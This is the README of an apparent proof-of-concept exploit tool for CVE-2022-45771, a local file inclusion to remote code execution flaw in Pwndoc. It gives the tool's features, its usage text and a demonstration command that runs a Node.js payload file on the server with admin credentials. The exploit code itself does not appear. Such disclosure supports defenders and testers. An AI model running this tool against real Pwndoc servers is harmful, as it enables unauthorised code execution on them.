# CVE-2022-45771 - Pwndoc LFI to RCE

<p align="center">
  Pwndoc local file inclusion to remote code execution of Node.js code on the server, discovered by <a href="">@yuriisanin</a>
  <img alt="PyPI" src="">
  <img alt="GitHub release (latest by date)" src="">
  <img alt="Python pip build" src="">
  <a href="" title="Follow"><img src=""></a>
  <a href="" title="Subscribe"><img alt="YouTube Channel Subscribers" src=""></a>

## Features

 - [x] Custom Node.js code to execute server-side using `--payload-file`
 - [x] Cleanup after exploit

## Requirements

 - [x] An admin account on the PwnDoc instance

## Usage

$ ./ -h
CVE-2022-45771 Pwndoc-LFI-to-RCE v1.1 - by @podalirius_

usage: [-h] -u USERNAME -p PASSWORD -H HOST [-P PORT] [-v] [--http] [-f PAYLOAD_FILE]

Poc of CVE-2022-45771 Pwndoc-LFI-to-RCE

  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Pwndoc username
  -p PASSWORD, --password PASSWORD
                        Pwndoc password
  -H HOST, --host HOST  Pwndoc ip
  -P PORT, --port PORT  Pwndoc port
  -v, --verbose         Verbose mode. (default: False)
  --http                HTTP mode. (default: False)
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        File containing node.js code to run on the server.

## Demonstration

./ -u admin -p 'Admin123!' --host --payload-file files/exploit.js

## References
 - Issue by [@yuriisanin](